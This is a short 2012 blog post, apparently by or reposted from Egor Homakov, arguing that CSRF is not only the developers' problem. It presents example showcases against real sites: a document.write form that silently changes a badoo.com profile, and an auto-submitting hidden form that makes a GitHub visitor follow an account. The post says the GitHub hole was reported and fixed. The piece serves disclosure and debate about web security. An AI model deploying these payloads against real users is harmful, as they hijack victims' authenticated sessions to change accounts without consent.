Thursday, April 05, 2012

A few CSRF-like vulnerable examples.

Remark: Post is published on April 2(but was expected yesterday) coz Berlin haz no free wifi cause I'm not joking and I figured out that Sunday is the worst day for urgent updates. Well, who cares the date, enjoy:

TL;DR:
I'm trying hard to prove my point that statement "CSRF is only the developers' problem" is not true. I provided some examples and I want you to check them out. I really appreciate any viewpoint at this problem. Thank you for your attention in advance!

Quick overview:

showcase: 
document.write('<form action="http://badoo.com/ws/anketa-ws.phtml?ws=1" method=post> <input name="name" value="SUUUUP"><input name="fname" value="SUUUUP"><input name="sname" value="SUUUUP"><input name="birth_day" value="28"><input name="birth_month" value="01"><input name="section" value="basic"><input name="birth_year" value="1991"> </form>')

description: 
e.g. changing your profile details. No protection at all.

showcase: 
<script>
document.write('<form target=ifr name=pwn method=post action="https://github.com/users/follow?target=homakov"></form>')
pwn.submit()
</script>

description: 
makes you follow certain account without your confirmation. reported few weeks ago and fixed. 

showcase: 
description: 
deleting presentation via GET. commenting w/o confirmation. GET following etc

Read more: Egor Homakov
QR: Inline image 1

Posted via email from Jasper-Net